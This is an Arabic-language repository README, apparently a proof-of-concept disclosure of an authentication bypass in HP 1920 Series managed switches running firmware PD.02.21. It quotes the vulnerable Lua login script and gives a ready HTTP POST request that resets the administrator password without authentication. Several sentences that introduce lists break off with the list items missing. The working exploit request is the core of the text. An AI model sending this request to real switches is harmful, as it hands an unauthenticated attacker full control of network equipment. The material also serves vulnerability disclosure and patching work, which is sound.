
إصدار البرنامج الثابت: PD.02.21
الأجهزة المتأثرة: مفاتيح HP 1920 Series الذكية المُدارة
يوثق هذا المستودع ثغرة خطيرة لتجاوز المصادقة في مفاتيح HP 1920 Series الذكية المُدارة التي تعمل بإصدار البرنامج الثابت PD.02.21. تسمح هذه الثغرة لمهاجم غير مصادَق بتغيير كلمة مرور المسؤول دون مصادقة مسبقة، مما يتيح فعليًا السيطرة الكاملة على الجهاز.
توجد الثغرة في السكربت /login/default_password_cfg.lua، الذي يتعامل مع تغيير كلمة المرور الافتراضية للجهاز. يقوم هذا السكربت بما يلي:
oldPwd يطابق كلمة المرور الافتراضية (وهي فارغة/خالية)القسم الضعيف الرئيسي في default_password_cfg.lua:
if (request_method == 'POST') then
-- No authentication or session checks!
local defaultPassword = fpaux.string_const("FD_USER_MGR_DEFAULT_PASSWORD")
-- ...
if form_post.oldPwd ~= defaultPassword then
errorStatus = "401 Unauthorized"
errorText = label.old_password_mismatch
else
-- Proceeds to change password
-- ...
end
end
يفتقر السكربت إلى ضوابط أمنية حاسمة:
يمكن للمهاجم استغلال هذه الثغرة باستخدام طلب HTTP POST بسيط:
POST /login/default_password_cfg.lua HTTP/1.1
Host: [target-ip]
Content-Type: application/x-www-form-urlencoded
Content-Length: [length]
username=admin&oldPwd=&newPwd=[new-password]&confirmPwd=[new-password]
ملاحظة: يُترك معامل oldPwd فارغًا لأن كلمة المرور الافتراضية فارغة.
تسمح هذه الثغرة لمهاجم غير مصادَق بما يلي:
لم أجد الوقت للبحث في هوية من اكتشف هذه الثغرة في الأصل؛ أنا فقط أنشر إثبات المفهوم.
يتم توفير هذه المعلومات للأغراض التعليمية فقط. لا يتحمل المؤلف أي مسؤولية عن أي إساءة استخدام لهذه المعلومات. احصل دائمًا على إذن مناسب قبل اختبار الثغرات.